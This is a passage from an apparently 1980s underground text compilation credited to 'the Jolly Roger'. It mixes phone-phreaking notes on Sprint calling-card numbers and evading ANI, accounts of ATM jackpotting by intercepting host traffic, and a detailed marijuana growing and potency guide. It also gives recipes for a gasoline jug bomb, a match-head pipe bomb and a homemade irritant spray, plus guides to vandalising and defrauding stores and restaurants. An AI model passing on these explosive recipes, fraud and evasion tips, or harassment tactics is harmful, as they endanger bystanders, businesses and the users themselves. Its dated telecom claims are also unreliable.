production of codes in the future hacking Sprint.
Also, if you have any hints/tips you think others
could benefit from, then
type them up and upload them to one of the boards at the end of the
newsletter.
Rumors: Why Spread Them? By: Tracker
Do you ever
get tired of hearing rumors? You know, someone gets an urge to impress others,
so they
create a rumor that some long distance company is now using tracing
equipment. Why start rumors? It
only scares others out of phreaking, and
then makes you, the person who started the rumor, look like
Mr. Big. This
article is short, but it should make you aware of the rumors that people spread
for
personal gain. The best thing to do is to denote them as a rumor starter
and then leave it at that.
You should not rag on them constantly, since if
the other users cannot determine if it is fact or
rumor, then they should
suffer the consequences.
The New Sprint FON Calling Cards By: Tracker
US Sprint has opened up a new long distance network called the Fiber
Optic Network (FON), in which
subscribers are given calling cards. These
calling cards are 14 digits, and though, seem randomly
generated, they are
actually encrypted. The rumors floating around about people getting caught using
the Sprint FON calling cards are fact, not rumors. The reason people are
getting caught is that they
confuse the FON calling cards with the local 950
port authorization codes. If you will remember, you
never use AT&T
calling cards from you home phone. It has ANI capability, which is not tracing,
but
rather the originating phone number is placed on the bill as soon as the
call is completed. They know
your phone number when you call the 800 access
port, but they do not record it until your call is
completed. Also, through
several of my hacks, I came up with some interesting information surrounding
the new Sprint network. They are listed below.
800-877-0000
This
number is for information on US Sprint's 800 calling card service. I have not
played around with
it, but I believe it is for trouble or help with the FON
calling cards. I am not sure if it is for
subscribing to the FON network.
800-877-0002 - You hear a short tone, then nothing.
800-877-0003 -
US Sprint Alpha Test Channel #1
800-877-(0004-0999)
When you call these
numbers, you get a recording saying: "Welcome to US Sprint's 1 plus service."
When
the recording stops, if you hit the pound key (#) you will get the
calling card dial tone.
Other related Sprint numbers
800-521-4949 This is the number that you subscribe to US Sprint with.
You may also subscribe to the
FON network on this number. It will take 4 to
5 weeks for your calling card to arrive.
10777
This is US
Sprint's equal access number. When you dial this number, you then dial the
number you are
calling, and it will be billed through US Sprint, and you
will receive their long distance line for
that call. Note that you will be
billed for calls made through equal access. Do not mistake it to be a
method
of phreaking, unless used from a remote location.
If you are in US Sprint's
1+ service then call 1+700-555-1414, which will tell you which long distance
company you are using. When you hear: "Thank you for choosing US Sprint's 1
plus service," hit the
pound key (#), and then you will get the US Sprint
dial tone. This however is just the same as if you
are calling from your
home phone if you dial direct, so you would be billed for calls made through
that, but there are ways to use this to your advantage as in using equal
access through a PBX.
Automatic Number Identification (ANI) By: Tracker
The true definition for Automatic Number Identification has not been
widely known to many. Automatic
Number Identification, (AKA: ANI), is the
process of the destination number knowing the originating
number, which is
where you are calling from. The method of achieving this is to send the phone
number
that you are calling from in coded form ahead of the destination
number. Below is an example of this.
ANI Method
Dial: 267-0293
Sent: ********2670293
* - Denotes the originating number which is coded
and sent before the number
As you noticed there are 8 digits in the
coded number. This is because, at least I believe, it is
stored in a
binary-like form. Automatic Number Identification means a limited future in
phreaking. ANI
does not threaten phreaking very much yet, but it will in the
near future. A new switching system will
soon be installed in most cities
that are covered by ESS, Electronic Switching System, now.
The system will
have ANI capabilities which will be supplied to the owners of phone lines as
anadded
extra. The owner's phone will have an LED read-out that will show
the phone number of the people that
call you. You will be able to block some
numbers, so that people cannot call you. This system is in
the testing
stages currently, but will soon be installed across most of the country. As you
see, this
will end a large part of phreaking, until we, the phreakers, can
come up with an alternative. As I
have been told by several, usually
reliable, people, this system is called ISS, which I am not sure of
the
meaning of this, and is being tested currently in Rhode Island.
800 in-watts
lines set up by AT&T support ANI. The equipment to decode an ANI coded
origination number
does not costs as much as you would expect. 950 ports do
not offer ANI capability, no matter what you
have been told. The 950 ports
will only give the city in which they are based, this usually being the
largest in the state, sometimes the capitol. One last thing that I should
tell you is that ANI is not
related to tracing. Tracing can be done on any
number whether local, 950, etc. One way around this,
especially when dialing
Alliance TeleConferencing, is to dial through several extenders or ports. ANI
will only cover the number that is calling it, and if you call through a
number that does not support
ANI, then your number will never be known.
The Disclaimer!
We, the editors, take no responsibility for your
actions and use of the information in this
newsletter. This newsletter is
for informational purposes only. There will never be any long distance
codes, passwords, etc. in this newsletter. If you are easily offended by
telecommunication
discussions, then we suggest that you not read this
newsletter. But for those who are truely
interested in the information in
this newsletter, enjoy it.
Brought to you in Cookbook III, courtesy of
the Jolly Roger!!!!!!!!!!
-Exodus- Revised.
Index
Jackpotting ATM Machines courtesy of the Jolly Roger
JACKPOTTING was done rather successfully a while back in (you guessed
it) New York.
What the culprits did was:
Sever (actually cross
over) the line between the ATM and the host. insert a microcomputer between the
ATM and the host. insert a fradulent card into the ATM. (card=cash card, not
hardware) What the ATM
did was: send a signal to the host, saying "Hey! Can
I give this guy money, or is he broke, or is his
card invalid?" What the
microcomputer did was: intercept the signal from the host, discard it, send
"there's no one using the ATM" signal.
What the host did was: get the
"no one using" signal, send back "okay, then for God's sake don't spit
out
any money!" signal to ATM.
What the microcomputer did was:
intercept signal (again), throw it away (again), send "Wow! That guy is
like TOO rich! Give him as
much money as he wants. In fact, he's so loaded,
give him ALL the cash we have! He is really a valued
customer." signal.
What the ATM did:
what else? Obediently dispense cash till the
cows came home (or very nearly so).
What the crooks got:
well in
excess of $120,000 (for one weekend's work), and several years when they were
caught. This
story was used at a CRYPTOGRAPHY conference I attended a while
ago to demonstrate the need for better
information security. The lines
between ATM's & their hosts are usually 'weak' in the sense that the
information transmitted on them is generally not encrypted in any way. One
of the ways that
JACKPOTTING can be defeated is to encrypt the information
passing between the ATM and the host. As
long as the key cannot be
determined from the ciphertext, the transmission (and hence the transaction)
is secure.
A more believable, technically accurate story might concern a
person who uses a computer between the
ATM and the host to determine the key
before actually fooling the host. As everyone knows, people find
cryptanalysis a very exciting and engrossing subject...don't they? (Hee-Hee)
_____ ______
| |-<<-| |-<<-| |
|ATM| micro |Host|
|___|->>-| |->>-|____|
The B of A ATM's are connected
through dedicated lines to a host computer as the Bishop said. However,
for
maintenance purposes, there is at least one separate dial-up line also going to
that same host
computer. This guy basically bs'ed his way over the phone
till he found someone stupid enough to give
him th number. After finding
that, he had has Apple hack at the code. Simple.
Step 2: He had a friend go
to an ATM with any B of A ATM card. He stayed at home with the Apple
connected to the host. When his friend inserted the card, the host displayed
it. The guy with the
Apple modified the status & number of the card
directly in the host's memory. He turned the card into
a security card, used
for testing purposes. At that point, the ATM did whatever it's operator told it
to do.
The next day, he went into the bank with the $2000 he received,
talked to the manager and told him
every detail of what he'd done. The
manager gave him his business card and told him that he had a job
waiting
for him when he got out of school.
Now, B of A has been warned, they might
have changed the system. On the other hand, it'd be awful
expensive to do
that over the whole country when only a handful of people have the resources and
even
less have the intelligence to duplicate the feat. Who knows?
Index
Jug Bomb by the Jolly Roger
Take a glass jug, and put 3 to 4 drops of gasoline into it. Then put the
cap on, and swish the gas
around so the inner surface of the jug is coated.
Then add a few drops of potassium permanganate
solution into it and cap it.
To blow it up, either throw it at something, or roll it at something.
------------Exodus------------
Index
Fun at K-Mart by the Jolly Roger
Well, first off, one must realise the importance of K-Marts in society
today. First off, K-Marts
provide things cheaper to those who can't afford
to shop at higher quality stores. Although, all I
ever see in there is
minorities and Senior Citizens, and the poor people in our city. Personally, I
wouldn't be caught dead in there. But, once, I did.
You see, once,
after The Moon Roach and Havoc Chaos(Dear friends of mine) and I were exploring
such
fun things as rooftops, we came along a K-Mart. Amused, and cold for
that matter, we wandered in. The
Tension mounts.
As we walked up to
the entrance, we were nearly attacked by Youth Groups selling cheap cookies, and
wheelchair sticken people selling American Flags. After laughing at these
people, we entered. This is
where the real fun begins...
First, we
wandered around the store, and turned on all the blue lights we could find. That
really
distracts and confuses the attendents...Fun to do...
The
first neat thing, is to go to the section of the store where they sell
computers. Darkness engulf
the earth the day they find Apple Computers being
sold there. Instead, lesser computers like the
laughable C-64 can be found
there...Turn it on, and make sure nobody's looking...Then, once in Basic,
type...
10 PRINT "Fuck the world! Anarchy Rules!" (or something to that
effect.)
20 GOTO 10 and walk away.
Also, set the sample radios in
the store to a santanic rock station, and turn the radio off. Then, set
the
alarm for two minutes ahead of the time displayed there. Turn the volume up all
the way, and walk
away. After about two minutes, you will see the clerk
feebly attempt to turn the radio down or off.
It's really neat to set ten or
more radios to different stations, and walk away.
One of my favorite
things to do, is to get onto the intercom system of the store. Easier typed then
done. First, check out the garden department. You say there's no attendent
there? Good. Sneak
carefully over to the phone behind the cheap counter
there, and pick it up. Dial the number
corrisponding to the item that says
'PAGE'... And talk. You will note that your voice will echo all
over the
bowels of K-Mart.
I would suggest announcing something on the lines of:
"Anarchy rules!!"
------------Exodus-------------
Index
Mace Substitute by the Jolly Roger
* 3 PARTS: Alcohol
* 1/2 PARTS: Iodine
* 1/2 PARTS: Salt
Or:
* 3 PARTS: Alcohol
* 1 PARTS: Iodized Salt (Mortons)
It's not actual mace, but it does a damn good job on the eyes...
--------------Exodus
Index
How to grow Marijuana courtesy of the Jolly Roger
MARIJUANA
Marijuana is a deciduous plant which grows from seeds.
The fibrous section of the plant was (has been
replaced by synthetics) used
to make rope. The flowering tops, leaves, seeds, and resin of the plant
is
used by just about everyone to get HIGH.
Normally, the vegetable parts of
the plant are smoked to produce this "high," but thay can also be
eaten. The
axtive ingredient in marijuana resin is THC (tetahydrocannabinol). Marijuana
contains from
1 - 4 per cent THC (4 per cent must be considered GOOD dope).
Marijuana grows wild in many parts of the world, and is cultivated in
Mexice, Vietnam, Africa, Nepal,
India, South America, etc.,etc. The
marijuana sold in the United States comes primarily from, yes, the
Uniited
States.
It is estimated that at least 50 per cent of the grass on the
streets in America is homegrown. The
next largest bunch comes actoss the
borders from Mexico, with smaller amounts filtering in from
Panama,
occasionally South America, and occasinally, Africa.
Hashish is the pure
resin of the marijuana plant, which is scraped from the flowering tops of the
plant and lumped together. Ganja is the ground-up tops of the finest plants.
(It is also the name
given to any sort of marijuana in Jamaica.)
Marijuana will deteriorate in about two years if exposed to light, air or
heat. It should always be
stored in cool places.
Grass prices in the
United States are a direct reflection of the laws of supply and demand (and you
thought that high school economics would never be useful). A series of large
border busts, a short
growing season, a bad crop, any number of things can
drive the price of marijuana up. Demand still
seems to be on the increase in
the U.S., so prices seldom fall below last year's level.
Each year a small
seasonal drought occurs, as last year's supply runs low, and next year's crop is
not
up yet. Prices usually rase about 20 - 75 per cent during this time and
then fall back to "normal."
Unquestionably, a large shortage of grass causes
a percentage of smokers to turn to harder drugs
instead. For this reason, no
grass control program can ever be beneficial or "successful."
GROW IT!
There is one surefire way of avoiding high prices and the grass DT's:
Grow your own. This is not as
difficult as some "authorities" on the subject
would make you believe. Marijuana is a weed, and a
fairly vivacious one at
that, and it will grow almost in spite of you.
OUTDOORS
Contrary
to propular belief, grass grows well in many place on the North American
continent. It will
flourish even if the temperature does not raise above 75
degrees.
The plants do need a minimum of eight hours of sunlight per day and
should be planted in late
April/early May, BUT DEFINITELY, after the last
frost of the year.
Growing an outdoor, or "au naturel", crop has been the
favored method over the years, because grass
seems to grow better without as
much attention when in its natural habitat.
Of course, an outdoors setting
requires special precautions not encoun- tered with an indoors crop;
you
must be able to avoid detection, both from law enforcement freaks and common
freaks, both of whom
will take your weed and probably use it. Of course, one
will also arrest you. You must also have
access to the area to prepare the
soil and harvest the crop. There are two schools of thought about
starting
the seeds. One says you should start the seedlings for about ten days in an
indoor starter
box (see the indoor section) and then transplant. The other
theory is that you should just start them
in the correct location. Fewer
plants will come up with this method, but there is no shock of
transplant to
kill some of the seedlings halfway through.
The soil should be preprepared
for the little devils by turning it over a couple of times and adding
about
one cup of hydrated lime per square yard of soil and a little bit (not too much,
now) of good
water soluble nitrogen fertilizer. The soil should now be
watered several times and left to sit about
one week.
The plants should
be planted at least three feet apart, getting too greedy and stacking them too
close
will result in stunted plants. The plants like some water during their
growing season, BUT not too
much. This is especially true around the roots,
as too much water will rot the root system.
Grass grows well in corn or
hops, and these plants will help provide some camouflage. It does not grow
well with rye, spinach, or pepperweed. It is probally a good idea to plant
in many small, broken
patches, as people tend to notice patterns.
GENERAL GROWING INFO
Both the male and he female plant produce
THC resin, although the male is not as strong as the female.
In a good crop,
the male will still be plenty smokable and should not be thrown away under any
circumstances. Marijuana can reach a hight of twenty feet (or would you
rather wish on a star) and
obtain a diameter of 4 1/2 inches. If normal, it
has a sex ratio of about 1:1, but this can be altered
in several ways.
The male plant dies in the 12th week of growing, the female will live
another 3 - 5 weeks to produce
her younguns. Females can weigh twice as much
as males when they are mature.
Marijuana soil should compact when you
squeeze it, but should also break apart with a small pressure
and absorb
water well. A nice test for either indoor or outdoor growing is to add a bunch
of worms to
the soil, if they live and hang aroung, it is good soil, but if
they don't, well, change it. Worms
also help keep the soil loose enough for
the plants to grow well.
SEEDS
To get good grass, you should
start with the right seeds. A nice starting point is to save the seeds
form
the best batch you have consumed. The seeds should be virile, that is, they
should not be grey
and shiriveled up, but green, meaty, and healthy
appearing. A nice test is to drop the seeds on a hot
frying pan. If they
"CRACK," they are probably good for planting purposes.
The seeds should be
soaked in distilled water overnight before planting. BE SURE to plant in the
ground with the pointy end UP. Plant about 1/2" deep. Healthy seeds will
sprout in about five days.
SPROUTING
The best all around
sprouting method is probably to make a sprouting box (as sold in nurseries) with
a
slated bottom or use paper cups with holes punched in the bottoms. The
sprouting soil should be a
mixture of humus, soil, and five sand with a bit
of organic fertilizer and water mixed in about one
week before planting.
When ready to transplant, you must be sure and leave a ball of soil around
the roots of each plant.
This whole ball is dropped into a baseball-sized
hold in the permanent soil.
If you are growing/transplanting indoors, you
should use a green safe light (purchased at nurseries)
during the
transplanting operation. If you are transplanting outdoors, you should time it
about two
hours befor sunset to avoid damage to the plant. Always wear
cotton gloves when handling the young
plants.
After the plants are set
in the hole, you should water them. It is also a good idea to use a
commercial transplant chemical (also purchased at nurseries) to help then
overcome the shock.
INDOOR GROWING
Indoor growing has many
advantages, besides the apparent fact that it is much harder to have your crop
"found," you can control the ambient conditions just exactly as you want
them and get a guaranteed
"good" plant.
Plants grown indoors will not
appear the same as their outdoor cousins. They will be scrawnier
appearing
with a weak stems and may even require you to tie them to a growing post to
remain upright,
BUT THEY WILL HAVE AS MUCH OR MORE RESIN!
If growing in
a room, you should put tar paper on the floors and then buy sterilized bags of
soil form
a nursery. You will need about one cubic foot of soil for eavh
plant.
The plants will need about 150 ml. of water per plant/per week. They
will also need fresh air, so the
room must be ventilated. (however, the
fresh air should contain NO TOBACCO smoke.)
At least eight hours of light a
day must be provided. As you increase the light, the plants grow
faster and
show more females/less males. Sixteen hours of light per day seems to be the
best
combination, beyond this makes little or no appreciable difference in
the plant quality. Another idea
is to interrupt the night cycle with about
one hour of light. This gives you more females.
The walls of your growing
room should be painted white or covered with aluminum foil to reflect the
light.
The lights themselves can be either bulbs of fluorescent. Figure
about 75 watts per plant or one plant
per two feet of flouresent tube. The
fluorescents are the best, but do not use "cool white" types. The
light
sources should be an average of twenty inches from the plant and NEVER closer
than 14 inches.
They may be mounted on a rack and moved every few days as
the plants grow.
The very best light sources are those made by Sylvania and
others especially for growing plants (such
as the "gro lux" types).
HARVESTING AND DRYING
The male plants will be taller and have
about five green or yellow sepals, which will split open to
fertilize the
female plant with pollen. The female plant is shorter and has a small pistillate
flower,
which really doesn't look like a flower at all but rather a small
bunch of leaves in a cluster.
If you don't want any seeds, just good dope,
you should pick the males before they shed their pollen
as the female will
use some of her resin to make the seeds.
After another three to five weeks,
after the males are gone, the females will begin to wither and die
(from
loneliness?), this is the time to pick. In some nefarious Middle Eastren
countries, farmers
reportedly put their beehives next to fiels of marijuana.
The little devils collect the grass pollen
for their honey, which is
supposed to contain a fair dosage of THC.
The honey is then enjoyed by
conventional methods or made into ambrosia. If you want seeds - let the
males shed his pollen then pick him. Let the female go another month and
pick her.
To cure the plants, they must be dried. On large crops, this is
accomplished by constructing a drying
box or drying room. You must have a
heat source (such as an electric heater) which will make the
box/room each
130 degrees. The box/room must be ventilated to carry off the water-vapor-laden
air and
replace it with fresh. A good box can be constructed from an orange
crate with fiberglass insulated
walls, vents in the tops, and screen shelves
to hold the leaves. There must be a baffle between the
leaves and the heat
source.
A quick cure for smaller amounts is to: cut the plant at the soil
level and wrap it in a cloth so as
not to loose any leavs. Take out any
seeds by hand and store. Place all the leaves on a cookie sheet
or aluminum
foil and put them in the middle sheld of the oven, which is set on "broil." In a
few
seconds, the leaves will smoke and curl up, stir them around and give
another ten seconds before you
take them out.
TO INCREASE THE GOOD
STUFF
There are several tricks to increase the number of females, or the
THC content of plants:
* You can make the plants mature in 36 days if you
are in a hurry, by cutting back on the light to
about 14 hours, but the
plants will not be as big.
* You should gradually shorten the light cycle
until you reach fourteen hours.
* You can stop any watering as the plants
begin to bake the resin rise to the flowers. This will
increse the resin a
bit.
* You can use a sunlamp on the plants as they begin to develop flower
stalks.
* You can snip off the flower, right at the spot where it joins the
plant, and a new flower will
form in a couple of weeks.
This can be
repeated two or three times to get several times more flowers than usual.
If
the plants are sprayed with Ethrel early in their growing stage, they will
produce almost all
female plants. This usually speeds up the flowering also,
it may happen in as little as two weeks.
You can employ a growth changer
called colchicine. This is a bit hard to get and expensive. (Should be
ordered through a lab of some sort and costs about $35 a gram.)
To use
the colchicine, you should prepare your presoaking solution of distilled water
with about 0.10
per cent colchicine. This will cause many of the seeds to
die and not germinate, but the ones that do
come up will be polyploid
plants. This is the accepted difference between such strains as "gold" and
normal grass, and yours will DEFINITELY be superweed.
The problem here
is that colchicine is a posion in larger quanities and may be poisonous in the
first
generation of plants. Bill Frake, author of CONNOISSEUR'S HANDBOOK OF
MARIJUANA runs a very complete
colchicine treatment down and warns against
smoking the first generation plants (all succeeding
generations will also be
polyploid) bacause of this poisonous quality.
However, the Medical Index
shows colchicine being given in very small quantities to people for
treatment if various ailments. Although these quantities are small, they
would appear to be larger
than any you could recive form smoaking a
seed-treated plant.
It would be a good idea to buy a copy of CONNOISSEUR'S,
if you are planning to attempt this, and read
Mr. Drake's complete
instructions. Another still-experimental process to increase the resin it to
pinch off the leaf tips as soon as they appear from the time the plant is in
the seedling stage on
through its entire life-span. This produces a
distorted, wrecked-looking plant which would be very
difficuly to recognize
as marijuana. Of course, there is less substance to this plant, but such
wrecked creatures have been known to produve so much resin that it
crystallizes a strong hash all over
the surface of the plant - might be wise
to try it on a plant or two and see what happens.
PLANT PROBLEM CHART
Always check the overall enviromental conditions prior to passing
judgment - soil aroung 7 pH or
slightly less - plenty of water, light, fresh
air, loose soil, no water standing in pools.
SYMPTOM PROBABLY PROBLEM/CURE
Larger leaves turning yellow - Nitrogen dificiency - add
smaller leaves
still green. nitrate of soda or
organic fertilizer.
Older leaves will
curl at edges, Phosphorsus dificiency -
turn dark, possibaly with a purple
add commercial phosphate.
cast.
Mature leaves develop a yellowish
Magnesium dificiency -
cast to least veinal areas. add commercial fertilizer
with a magnesium content.
Mature leaves turn yellow and then Potassium
dificiency -
become spotted with edge areas add muriate of potash.
turning dark grey.
Cracked stems, no healthy support Boron dificiency -
add
tissue. any plant food containing
boron.
Small wrinkled leaves
with Zinc dificiency - add
yelloish vein systems. commercial plant food
containing zinc.
Young leaves become deformed, Molybedum dificiency -
possibaly yellowing. use any plant food with a
bit of molydbenum in it.
EXTRA SECTION:
BAD WEED/GOOD WEED
Can you turn bad weed into
good weed? Surprisingly enough, the answer to this oft-asked inquiry is,
yes!
Like most other things in life, the amount of good you are going to
do relates directly to how much
effort you are going to put into it. There
are no instant, supermarket products which you can spray on
Kansas catnip
and have wonderweed, but there are a number of simplified, inexpensive processes
(Gee,
Mr. Wizard!) thich will enhance mediocre grass somewhat, ant there are
a couple of fairly involved
processes which will do up even almost-parsley
weed into something worth writing home about.
EASES
1. Place the
dope in a container which allows air to enter in a restricted fashion (such as a
can
with nail holes punched in its lid) and add a bunch of dry ice, and the
place the whold shebang in
the freezer for a few days. This process will add
a certain amount of potency to the product,
however, this only works with
dry ice, if you use normal, everyday freezer ice, you will end up
with a
soggy mess...
2. Take a quantity of grass and dampen it, place in a baggie
or another socially acceptable
container, and store it in a dark, dampish
place for a couple of weeks (burying it also seems to
work). The grass will
develop a mold which tastes a bit harsh, a and burns a tiny bit funny, but
does increase the potency.
3. Expose the grass to the high intensity
light of a sunlamp for a full day or so. Personally, I
don't feel that this
is worth the effort, but if you just spent $400 of your friend's money for
this brick of super-Colombian, right-from-the-President's-personal-stash,
and it turns out to be
Missouri weed, and you're packing your bags to leave
town before the people arrive for their
shares, well, you might at least try
it. Can't hurt.
4. Take the undisirable portions of our stash (stems, seeds,
weak weed, worms, etc.) and place them
in a covered pot, with enough rubbing
alchol to cover everything.
Now CAREFULLY boil the mixture on an
ELECTRIC stove or lab burner. DO NOT USE GAS - the alchol is too
flammable.
After 45 minutes of heat, remove the pot and strain the solids out, SAVING THE
ALCOHOL.
Now, repeat the process with the same residuals, but fresh alchol.
When the second boil is over,
remove the solids again, combine the two
quantities of alcohol and reboil until you have a syrupy
mixture. Now, this
syrupy mixture will contain much of the THC formerly hidden in the stems and
such.
One simply takes this syrup the throughly combines it with the grass
that one wishes to improve upon.
SPECIAL SECTION ON RELATED SUBJECT
MARYGIN:
Marygin is an anagram of the words marijuana and gin, as in Eli
Whitney. It is a plastic tumbler which
acts much like a commercial cottin
gin. One takes about one ounce of an harb and breaks it up. This is
then
placed in the Marygin and the protuding knod is roatated. This action turns the
internal wheel,
which separates the grass from the debris (seeds, stems).
It does not pulberize the grass as screens have a habit of doing and is
easily washable.
Marygin is available from:
P.O. Box 5827
Tuscon,
Arizona 85703
$5.00
GRASS
Edmund Scientific Company
555
Edscorp Building
Barrington, New Jersy 08007
Free Catalog is a
wonder of good things for the potential grass grower. They have an electric
thermostat greenhouse for starting plants for a mere $14.95.
Soil test
kits for PH - $2.40
Al test - $9.95
Soil thermometer - $2.75
Lights
which approzimate the true color balance of the sun and are probably the most
beneficial types
available: 40 watt, 48 inch - 4 for $15.75.
Indoor sun
bulb, 75 or 150 watt - $5.75.
And, they have a natural growth regualtor for
plants (Gibberellin) which can change height, speed
growth, and maturity,
promote blossoming, etc. Each plant reacts differently to treatment with
Gibberellin...there's no fun like experimenting - $2.00
SUGGESTED
READING
THE CONNOISSEUR'S HANDBOOK OF MARIJUANA, Bill Drake
Straight
Arrow Publishing - $3.50
625 Third Street
San Francisco, California
FLASH
P.O.Box 16098
San Fransicso, California 94116
Stocks a
series of pamphlets on grass, dope manufacture, cooking.
Includes the Mary
Jane Superweed series.
Index
Match Head Bomb by the Jolly Roger
Simple safety match heads in a pipe, capped at both ends, make a
devestating bomb. It is set off with
a regular fuse. A plastic Baggie is put
into the pipe before the heads go in to prevent detonation by
contact with
the metal. Cutting enough match heads to fill the pipe can be tedious work for
one but an
evening's fun for the family if you can drag them away from the
TV.
------------Exodus----------
Index
How To Terrorize McDonalds by the Jolly Roger
(Originally an Apple ][ file so excuse the upper case!!!)
NOW,
ALTHOUGH Mc DONALDS IS FAMOUS FOR IT'S ADVERTISING AND MAKING THE WHOLE WORLD
THINK THAT THE BIG
MAC IS THE BEST THING TO COME ALONG SINCE SLICED BREAD
(BUNS?), EACH LITTLE RESTAURANT IS AS AMATEUR
AND SIMPLE AS A NEW-FOUND
BUSNESS. NOT ONLY ARE ALL THE EMPLOYEES RATHER INEXPERIENCED AT WHAT THEY'RE
=SUPPOSED= TO DO, BUT THEY WILL JUST LOOSE ALL CONTROL WHEN AN EMERGENCY
OCCURS....HERE WE GO!!!
FIRST, GET A FEW FRIENDS (4 IS GOOD...I'LL GET TO
THIS LATER) AND ENTER THE MCDONALDS RESTAURANT,
TALKING LOUDLY AND REAKING
OF SOME STRANGE SMELL THAT AUTOMATICALLY MAKES THE OLD COUPLE SITTING BY
THE
DOOR LEAVE. IF ONE OF THOSE PIMPLY-FACED GOONS IS WIPING THE FLOOR, THEN TRACK
SOME CRAP ALL OVER
IT (YOU COULD PRETEND TO SLIP AND BREAK YOUR HEAD, BUT
YOU MIGHT ACTUALLY DO SO).
NEXT, BEFORE YOU GET THE FOOD, FIND A TABLE.
START YELLING AND RELEASING SOME STRANGE BODY ODOR SO
=ANYBODY= WOULD LEAVE
THEIR TABLE AND WALK OUT THE DOOR. SIT 2 FRIENDS THERE, AND GO UP TO THE COUNTER
WITH ANOTHER. FIND A PLACE WHERE THE LINE IS SHORT, OR IF THE LINE IS LONG
SAY "I ONLY WANNA BUY A
COKE" AND YOU GET MOVED UP. NOW, YOU GET TO DO THE
=ORDERING= ...HEH HEH HEH. SOMEBODY =ALWAYS= MUST
WANT A PLAIN HAMBURGER
WITH ABSOLUTELY NOTHING ON IT (THIS TAKES EXTRA TIME TO MAKE, AND DRIVES THE
LITTLE HAMBURGER-MAKERS INSANE)..ORDER A 9-PACK OF CHICKEN MCNUGGETS...NO, A
20 PACK...NO, THREE 6
PACKS...WAIT...GO BACK TO THE TABLE AND ASK WHO WANTS
WHAT. YOUR OTHER FRIEND WAITS BY THE COUNTER AND
MAKES A PASS AT THE FEMALE
CLERK. GET BACK TO THE THING AND ORDER THREE 6-PACKS OF CHICKEN ETC....NOW
SHE SAYS "WHAT KIND OF SAUCE WOULD YOU LIKE?".OF COURSE, SAY THAT YOU ALL
WANT BARBECUE SAUCE ONE OF
YOUR FRIENDS WANTS 2 (ONLY IF THERE ARE ONLY 2
CONTAINERS OF BARBECUE SAUCE LEFT).THEN THEY HAFTA GO
INTO THE STOREROOM AND
OPEN UP ANOTHER BOX. FINALLY, THE DRINKS...SOMEBODY WANTS COKE, SOMEBODY ROOT
BEER, AND SOMEBODY DIET COKE. AFTER THESE ARE DELIVERED, BRING THEM BACK AND
SAY "I DIDN'T ORDER A
DIET COKE! I ORDERED A SPRITE!"
THIS GETS THEM
MAD; BETTER YET, TURN DOWN SOMETHING TERRIBLE THAT NOBODY WANTS TO DRINK, SO
THEY HAFTA
THROW THE DRINK AWAY; THEY CAN'T SELL IT. AFTER ALL THE FOOD(?)
IS HANDED TO YOU, YOU MUST =NEVER=
HAVE ENOUGH MONEY TO PAY. THE CLERK WILL
BE SO ANGRY AND CONFUSED THAT SHE'LL LET YA GET AWAY WITH IT
(ANOTHER
INFLUENCE ON HER IS YOUR FRIEND ASKING HER "IF YOU LET US GO I'LL GO OUT WITH
YOU" AND GIVING
HER A FAKE FONE NUMBER). NOW, BACK TO YOUR TABLE. BUT FIRST,
SOMEBODY LIKES KETCHUP AND MUSTARD.
AND PLENTY (TOO MUCH) OF NAPKINS. OH,
AND SOMEBODY LIKES FORKS AND KNIVES, SO ALWAYS END UP BREAKING
THE ONES YOU
PICK OUTTA THE BOX. HAVE YOUR FRIENDS YELL OUT,"YAY!!!!! WE HAVE MUNCHIES!!" AS
LOUD AS
THEY CAN. THAT'LL WORRY THE ENTIRE RESTAURANT. PROCEED TO SIT DOWN.
SO, YOU ARE SITTING IN THE SMOKING
SECTION (BY ACCIDENT) EH? WELL, WHILE ONE
OF THE TOBACCO-BREATHERS ISN'T LOOKING, PUT A SIGN FROM THE
OTHER SIDE OF
THE ROOM SAYING "DO NOT SMOKE HERE" AND HE'LL HAFTA MOVE...THEN HE GOES INTO THE
REAL
NON-SMOKING SECTION, AND GETS YELLED AT. HE THEN THINKS THAT NO SMOKING
IS ALLOWED IN THE RESTAURANT,
SO HE EATS OUTSIDE (IN THE POUR- ING RAIN)
AFTER YOUR MEAL IS FINISHED (AND QUITE A FEW
SPLATTERED-OPENED KETCHUP
PACKETS ARE ALL OVER YER TABLE), TRY TO LEAVE. BUT OOPS! SOMEBODY HAS TO DO
HIS DUTY IN THE MEN'S ROOM. AS HE GOES THERE, HE STICKS AN UNEATED HAMBURGGR
(WOULD YOU DARE TO EAT
ONE OF THEIR HAMBURGERS?)
INSIDE THE TOILET,
FLUSHES IT A WHILE,UNTIL IT RUNS ALL OVER THE BATHROOM. OOPS! SEND A
PIMPLY-FACED
TEENAGER TO CLEAN IT UP. (HE WON'T KNOW THAT BROWN THING IS A
HAMBURGER, AND HE'LL GET SICK. WHEEE!)
AS YOU LEAVE THE RESTCURANT, LOOKING
BACK AT YOUR UNCLEANED TABLE, SOMEBODY MUST REMEMBER THAT THEY
LEFT THEIR
CHOCOLATE SHAKE THERE! THE ONE THAT'S ALMOST FULL!!!! HE TAKES IT THEN SAYS
"THIS TASTES
LIKE CRAP!", THEN HE TAKES OFF THE LID AND THROWS IT INTO THE
GARBAGE CAN...OOPS! HE MISSED, AND NOW
THE SAME POOR SOUL WHO'S CLEANING UP
THE BATHROOM NOW HASTA CLEAN UP CHOCOLATE SHAKE. THEN LEAVE THE
JOINT,
REVERSING THE "YES, WE'RE OPEN" SIGN (AS A REMINDER OF YER VISIT THERE YOU HAVE
IT! YOU HAVE
JUST PUT ALL OF MCDONALDS INTO COMPLETE MAYHEM. AND SINCE THERE
IS NO PENALTY FOR LITTERING IN A
RESTAURANT, BUGGING PEOPLE IN A PUBLIC
EATERY (OR THROW-UPERY, IN THIS CASE) YOU GET OFF SCOT-FREE.
WASN'T THAT
FUN?
--------------Exodus-------------
Index
"Mentor's Last Words" courtesy of the Jolly Roger
The following file is being reprinted in honor and sympathy for the many
phreaks and hackers that have
been busted recently by the Secret Service.
Another one got caught today, it's all over the papers. "Teenager
Arrested in Computer Crime Scandal",
"Hacker Arrested after Bank
Tampering"... Damn kids. They're all alike. But did you, in your three-
piece psychology and 1950's technobrain, ever take a look behind the eyes of
the hacker? Did you ever
wonder what made him tick, what forces shaped him,
what may have molded him? I am a hacker, enter my
world... Mine is a world
that begins with school... I'm smarter than most of the other kids, this crap
they teach us bores me... Damn underachiever.
They're all alike. I'm in
junior high or high school. I've listened to teachers explain for the
fifteenth time how to reduce a fraction.
I understand it. "No, Ms.
Smith, I didn't show my work. I did it in my head..." Damn kid. Probably
copied it. They're all alike.
I made a discovery today. I found a
computer. Wait a second, this is cool. It does what I want it to.
If it
makes a mistake, it's because I screwed it up. Not because it doesn't like me...
Or feels
